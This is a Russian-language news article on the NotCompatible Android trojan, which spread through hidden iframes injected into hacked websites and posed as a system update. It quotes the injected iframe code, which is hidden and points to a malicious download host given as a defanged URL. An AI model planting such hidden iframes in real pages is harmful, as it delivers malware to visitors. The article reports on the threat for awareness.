Смартфоны на базе Android атаковал новый страшный вирус

Смартфоны на базе Android атаковал новый страшный вирусХакеры проникают в частные сети с помощью трояна для Android.

Эксперты из компании Lookout Mobile Security нашли серьезную троянскую программу для Android, которая распространяется через взломанные интернет-ресурсы, сообщают «Новости Америки».

Программа получила название NotCompatible. Ее создатели взламывают сайты и помещают в их код элемент iframe со ссылкой на троян. Сообщается, что NotCompatible выдает себя за обновление для Android. Заражение происходит в том случае, если пользователь не только загрузил файл, но и установил программу на устройство.

Программа распространялась путем добавления в код взломанных ресурсов специальной ссылки iframe на вредоносный файл. При открытии взломанного сайта, через браузер ОС Android, автоматически начинал загружаться файл Update.apk

По окончании загрузки на экране устройства отображается окно, в котором пользователь должен подтвердить установку приложения. Также для установки приложения на устройстве должна быть включена настройка «Unknown sources». В случае если эта опция отключена, загрузка будет автоматически заблокирована, добавляет Securitylab.

Контролируемые или скомпрометированные злоумышленниками сайты содержат в себе такой код:

<iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-33713371337}”></iframe>

Сайт с таким Iframe отображает ложное сообщение о том, что для просмотра содержимого необходимо осуществить установку дополнительного ПО. При этом загрузка программы осуществляется не с официального магазина Google Play.

Разработчики вируса сделали такую схему только для устройств на базе Android, на других операционных системах или же на ОС стационарных ПК такая схема не работает, то есть загрузка вредоносного файла не осуществляется, уточняет Presscenter.ru.

В блоге Lookout Mobile Security пишут, что пока программа не выполняет вредоносных операций. Тем не менее, есть риск, что создатели NotCompatible доработают вредоносную программу и будут использовать ее для вторжения в частные сети путем преобразования зараженного устройства в прокси-сервер.

На данный момент количество сайтов, содержащих вредоносный код, небольшая и они не отличаются высокой посещаемостью. Lookout Mobile Security отмечает, что случай с NotCompatible стал одним из первых, когда сломанные сайты используются для распространения трояна для мобильных устройств. Обычно к такой схеме прибегают создатели вредоносных программ для PC. 

По материалам сайта Topnews.

Впервые обнаружена сеть вредоносных программа на базе Android-устройств
Смартфонам на платформе Android угрожает новый вирус. Представители Google опровергают эти сообщения.

СМИ: Apple запускает программу обмена новых iPhone на старые Android-смартфоны
Компанией будет использоваться схема оценки аналогичная той, которая используется менеджерами в системе Trade-in, недавно запущенной Apple.


  • КОД,
  • Программа,
  • ФАЙЛ,
  • Загрузка,
  • Создатель
Комментировать публикацию через Постсовет:
Комментарии (0) RSS свернуть / развернуть

Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.


Комментировать публикацию через Вконтакте: